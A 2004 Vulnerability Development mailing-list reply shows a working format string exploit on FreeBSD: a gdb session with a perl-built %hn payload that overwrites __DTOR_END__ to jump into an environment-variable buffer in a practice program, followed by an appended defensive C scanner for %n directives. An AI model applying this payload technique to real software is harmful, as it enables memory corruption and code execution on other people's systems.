Vulnerability Development: Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT

From: Vlad902 <vlad902_at_gmail.com>
Date: Fri, 30 Jul 2004 17:24:45 -0700

-bash-2.05b$ uname -msr
FreeBSD 5.2.1-RC2 i386
-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049848 d __DTOR_END__
-bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...(gdb)
(gdb) x/1s 0xbfbfedf5
0xbfbfedf5: "EGG=vlad902"
(gdb) b * 0xbfbfedf9
Breakpoint 1 at 0xbfbfedf9
(gdb) run `perl -e 'print
"\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" .
"%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'`
...
[*] test_val @ 0x0804979c = -72 0xffffffb8
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0xbfbfedf9 in ?? ()

> Can somebody give me some hints, advice and guides?
Only advice I can give you is do it by hand rather than having tools
do it for you. Although while exploiting it beware, I found the stack
is very quirky which is why I seem to have so many useless %x's
lying around

  -vlad902
Received on Jul 31 2004
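As an added example (not code from the original post, and not the source of fmt_vuln.c, which is not shown here): a C check that counts the conversions and the %n-family write directives in a string before it could ever reach printf as a format, run against the payload from the gdb session above, next to the hardened call that passes user data only as an argument.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Walk a would-be format string and count its conversions.
 * Returns the number of conversions; *writes receives how many of
 * them are %n-family directives (%n, %hn, %hhn, %ln, %lln), i.e. the
 * ones that turn an uncontrolled format string into a memory write. */
int scan_format(const char *fmt, int *writes)
{
    int convs = 0;
    *writes = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')             /* literal "%%", not a conversion */
            continue;
        /* flags, field width, precision, positional "$" */
        while (*p && strchr("-+ #0123456789.*$", *p))
            p++;
        /* length modifiers such as the "h" in %hn */
        while (*p && strchr("hlLqjzt", *p))
            p++;
        if (!*p)                   /* trailing lone '%' */
            break;
        convs++;
        if (*p == 'n')
            (*writes)++;
    }
    return convs;
}

/* A string is only acceptable as a format if it contains no conversions at all. */
bool format_is_inert(const char *s)
{
    int writes;
    return scan_format(s, &writes) == 0;
}

/* Hardened output: user data is an argument, never the format. Any "%x" or
 * "%hn" inside 'user' is printed literally instead of being interpreted. */
int log_user_string(const char *user)
{
    return printf("%s\n", user);
}
```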
